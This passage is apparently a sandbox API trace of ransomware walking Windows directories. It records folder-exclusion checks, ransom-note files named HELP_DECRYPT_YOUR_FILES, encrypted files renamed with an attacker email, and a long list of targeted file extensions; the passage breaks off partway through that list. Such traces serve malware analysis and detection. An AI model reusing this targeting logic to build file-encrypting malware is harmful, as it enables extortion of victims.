	[0159.597] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0159.597] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\en-us.16\\*.*", lpSrch="programdata") returned 0x0
	[0159.597] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0159.598] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0159.598] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b54cf26, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x7899c62f, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x78a31f8a, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2a005c, dwReserved1=0x2a002e, cFileName="..", cAlternateFileName="")) returned 1
	[0159.598] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0159.598] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78a31f8a, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x78a31f8a, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x78a7e4e2, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0x2a005c, dwReserved1=0x2a002e, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0159.598] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78a31f8a, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x78a31f8a, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x78a31f8a, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x2a005c, dwReserved1=0x2a002e, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0159.598] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7852160a, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x7852160a, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x78548d2c, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x5770, dwReserved0=0x2a005c, dwReserved1=0x2a002e, cFileName="masterdescriptor.en-us.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="MASTER~1.SCL")) returned 1
	[0159.598] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1b5f1a63, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x1b5f1a63, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x341a3500, ftLastWriteTime.dwHighDateTime=0x1d0d7f0, nFileSizeHigh=0x0, nFileSizeLow=0x66, dwReserved0=0x2a005c, dwReserved1=0x2a002e, cFileName="s321033.hash", cAlternateFileName="S32103~1.HAS")) returned 1
	[0159.598] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78841f33, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x78841f33, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7899c62f, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xd81e0, dwReserved0=0x2a005c, dwReserved1=0x2a002e, cFileName="stream.x86.en-us.man.dat.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="STREAM~1.SCL")) returned 1
	[0159.599] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78841f33, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x78841f33, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7899c62f, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xd81e0, dwReserved0=0x2a005c, dwReserved1=0x2a002e, cFileName="stream.x86.en-us.man.dat.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="STREAM~1.SCL")) returned 0
	[0159.599] FindClose (in: hFindFile=0xfb9bf0 | out: hFindFile=0xfb9bf0) returned 1
	[0159.599] FindClose (in: hFindFile=0xfb9bf0 | out: hFindFile=0xfb9bf0) returned 0
	[0159.600] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7846237e, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x7846237e, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x78489aff, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0159.600] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7846237e, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x7846237e, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7846237e, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0159.600] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b5f5640, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x1b641eb6, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x1b641eb6, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="x-none.16", cAlternateFileName="")) returned 1
	[0159.600] lstrcmpW (lpString1="x-none.16", lpString2="..") returned 1
	[0159.600] lstrcmpW (lpString1="x-none.16", lpString2=".") returned 1
	[0159.600] lstrcpyW (in: lpString1=0x18a87c, lpString2="C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE" | out: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE") returned="C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE"
	[0159.600] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\") returned="C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\"
	[0159.600] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\", lpString2="x-none.16" | out: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\x-none.16") returned="C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\x-none.16"
	[0159.601] lstrcpyW (in: lpString1=0x189d74, lpString2="C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\x-none.16" | out: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\x-none.16") returned="C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\x-none.16"
	[0159.601] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\x-none.16", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\x-none.16\\") returned="C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\x-none.16\\"
	[0159.601] lstrcpyW (in: lpString1=0x189964, lpString2="C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\x-none.16\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\x-none.16\\") returned="C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\x-none.16\\"
	[0159.601] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\x-none.16\\", lpString2="*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\x-none.16\\*.*") returned="C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\x-none.16\\*.*"
	[0159.601] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\x-none.16\\*.*" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\x-none.16\\*.*"), lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b5f5640, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x1b641eb6, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x1b641eb6, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2a005c, dwReserved1=0x2a002e, cFileName=".", cAlternateFileName="")) returned 0xfb9bf0
	[0159.618] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\x-none.16\\*.*") returned 90
	[0159.618] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0159.619] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\x-none.16\\*.*", cchLength=0x5a | out: lpsz="c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\x-none.16\\*.*") returned 0x5a
	[0159.619] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0159.619] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\x-none.16\\*.*", lpSrch="windows") returned 0x0
	[0159.619] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0159.619] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\x-none.16\\*.*", lpSrch="boot") returned 0x0
	[0159.620] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0159.620] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\x-none.16\\*.*", lpSrch="system volume information") returned 0x0
	[0159.620] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0159.620] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\x-none.16\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0159.620] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0159.620] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\x-none.16\\*.*", lpSrch="temp") returned 0x0
	[0159.621] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0159.621] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\x-none.16\\*.*", lpSrch="program files") returned 0x0
	[0159.621] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0159.621] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\x-none.16\\*.*", lpSrch="program files (x86)") returned 0x0
	[0159.621] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0159.621] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\x-none.16\\*.*", lpSrch="appdata") returned 0x0
	[0159.622] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0159.622] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\x-none.16\\*.*", lpSrch="application data") returned 0x0
	[0159.622] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0159.622] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\x-none.16\\*.*", lpSrch="winnt") returned 0x0
	[0159.622] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0159.622] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\x-none.16\\*.*", lpSrch="tmp") returned 0x0
	[0159.622] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0159.623] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\x-none.16\\*.*", lpSrch="cache") returned 0x0
	[0159.623] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0159.623] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\x-none.16\\*.*", lpSrch="temporary internet files") returned 0x0
	[0159.623] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0159.623] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\x-none.16\\*.*", lpSrch="webcache") returned 0x0
	[0159.623] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0159.624] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\x-none.16\\*.*", lpSrch="inetcache") returned 0x0
	[0159.624] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0159.624] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\x-none.16\\*.*", lpSrch="nvidia") returned 0x0
	[0159.624] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0159.624] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\x-none.16\\*.*", lpSrch="packages") returned 0x0
	[0159.624] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0159.625] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\x-none.16\\*.*", lpSrch="cookies") returned 0x0
	[0159.625] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0159.625] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\x-none.16\\*.*", lpSrch="programdata") returned 0x0
	[0159.625] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b5f5640, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x1b641eb6, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x1b641eb6, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2a005c, dwReserved1=0x2a002e, cFileName="..", cAlternateFileName="")) returned 1
	[0159.625] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1b61bc49, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x1b61bc49, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x206dcf00, ftLastWriteTime.dwHighDateTime=0x1d0d7ee, nFileSizeHigh=0x0, nFileSizeLow=0x5220, dwReserved0=0x2a005c, dwReserved1=0x2a002e, cFileName="MasterDescriptor.x-none.xml", cAlternateFileName="MASTER~1.XML")) returned 1
	[0159.625] lstrcmpW (lpString1="MasterDescriptor.x-none.xml", lpString2="..") returned 1
	[0159.625] lstrcmpW (lpString1="MasterDescriptor.x-none.xml", lpString2=".") returned 1
	[0159.625] lstrcpyW (in: lpString1=0x18a3d4, lpString2="C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\x-none.16\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\x-none.16\\") returned="C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\x-none.16\\"
	[0159.626] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\x-none.16\\", lpString2="MasterDescriptor.x-none.xml" | out: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\x-none.16\\MasterDescriptor.x-none.xml") returned="C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\x-none.16\\MasterDescriptor.x-none.xml"
	[0159.626] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\x-none.16\\MasterDescriptor.x-none.xml") returned 114
	[0159.626] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0159.626] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\x-none.16\\MasterDescriptor.x-none.xml", cchLength=0x72 | out: lpsz="c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\x-none.16\\masterdescriptor.x-none.xml") returned 0x72
	[0159.626] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0159.626] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\x-none.16\\masterdescriptor.x-none.xml", lpSrch="help_decrypt_your_files") returned 0x0
	[0159.626] lstrcpyW (in: lpString1=0x189f7c, lpString2="c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\x-none.16\\masterdescriptor.x-none.xml" | out: lpString1="c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\x-none.16\\masterdescriptor.x-none.xml") returned="c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\x-none.16\\masterdescriptor.x-none.xml"
	[0159.627] lstrlenW (lpString="c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\x-none.16\\masterdescriptor.x-none.xml") returned 114
	[0159.627] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0159.627] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0159.627] StrStrW (lpFirst=".xml", lpSrch=".") returned=".xml"
	[0159.627] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0159.628] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp